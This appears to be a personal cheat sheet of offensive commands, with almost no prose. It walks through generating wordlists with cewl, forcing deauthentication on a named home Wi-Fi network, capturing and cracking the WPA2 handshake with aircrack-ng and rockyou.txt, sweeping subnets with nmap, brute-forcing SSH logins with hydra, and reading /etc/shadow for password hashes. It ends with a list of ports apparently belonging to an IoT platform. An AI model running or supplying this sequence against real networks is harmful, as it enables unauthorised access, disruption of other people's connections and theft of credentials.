-
sudo apt install cewl
-
cewl -d 1 -m 8 -w wordlist-d1m8-samecase.txt https://avengers.marvelhq.com/
-
cewl -d 1 -m 8 -w wordlist-d1m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase
-
cewl -d 2 -m 8 -w wordlist-d2m8-lowercase.txt https://avengers.marvelhq.com/ --lowercase
-
cewl -d 1 -m 1 -w wordlist-d1m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase
-
cewl -d 1 -m 1 -w wordlist-d1m1-samecase.txt https://avengers.marvelhq.com/
-
cewl -d 2 -m 1 -w wordlistd2m1-d2m1-lowercase.txt https://avengers.marvelhq.com/ --lowercase
curl "https://avengers.marvelhq.com/" | sed 's/[^a-zA-Z ]/ /g' | tr 'A-Z ' 'a-z\n' | grep '[a-z]' | sort -u > wordlist.txt
- The shortest password allowed with WPA2 is 8 characters long
- sudo su
- echo | sudo -S
-
iwconfig
-
airmon-ng check kill
-
airmon-ng
-
airmon-ng start wlan0
-
airmon-ng
-
macchanger --mac 00:11:22:33:44:55 wlan0
-
macchanger -s wlan0 (60:a4:b7:22:74:9f)
-
airmon-ng start wlan0
-
airodump-ng wlan0
to retrieve bssid mac and chanel
-
airodump-ng -c 1 -w file --bssid 48:29:52:46:92:CB wlan0
-
aireplay-ng --deauth 1 -a 48:29:52:46:92:CB -c 60:a4:b7:22:74:9f wlan0
-
aircrack-ng -w wordlist.txt file-01.cap
To retrieve MAC ADDRESS, CHANNEL and ESSID use:
- sudo airodump-ng wlan0
- MA => 48:29:52:46:92:CB
- CH => 1
- ESSID => Casa_wifi
- To check station connected to the router:
- sudo airodump-ng -c 1 wlan0 -d 48:29:52:46:92:CB
- Specify the channel to use aireplay correctly
- Run this analyzes packets before deauth everyone to writes handshake to a file:
- sudo airodump-ng -w hacktest -c 1 --bssid 48:29:52:46:92:CB wlan0
- To forces deauth everyone:
- sudo aireplay-ng --deauth 0 -a 48:29:52:46:92:CB wlan0
-
Uses the hack01-01.cap to analyze in wireshark: search for *eapol which is the handshake protocol used to auth
-
Check for the second message of the handshake in:
- 802.1X authentication
- WPA KEY DATA: 30140100000fac040100000fac040100000fac020c00
- the handshake packets is needed to step 6 can try a bunch of random passwords...
⚠️ we can skip the step 4 e 5 above and just try the step 6 and with lucky it works⚠️
- sudo aircrack-ng hack-01.cap -w wordlist.txt
- and the outputs should appear !!!
- sudo aircrack-ng hack01-01.cap -w /usr/share/wordlists/rockyou.txt
-
systemctl start ssh.socket
-
systemctl stop ssh.socket
-
sudo airmon-ng stop wlan0
-
sudo service NetworkManager restart
-
iwconfig
-
ifconfig
-
sudo nmap -sP 192.168.15.0/24
-
sudo nmap -sP 192.168.15.0/24 -p 80,22
-
sudo nmap 192.168.0.* -p ssh --open
-
sudo nmap 192.168.15.* --open
-
ssh user@ipaddress
-
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.15.1 -t 4 ssh
-
hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh
-L list of users -M list of ips
- sudo vim /var/www/html/index.html
- ls -l /etc/passwd => to see owner, first column name
- cat /etc/passwd => users
- cat /etc/shadow => users and password hash
Port Transport Protocol
22 TCP SSH
5000 TCP Helix Web Interface
3030 TCP Helix Orchestrator
22443 TCP Helix Hardware Monitor
1026 TCP CEF Context Broker
27000 TCP MongoDB
5050 TCP Cygnus
1883 TCP Eclipse-Mosquitto
4041 TCP IoT Agent MQTT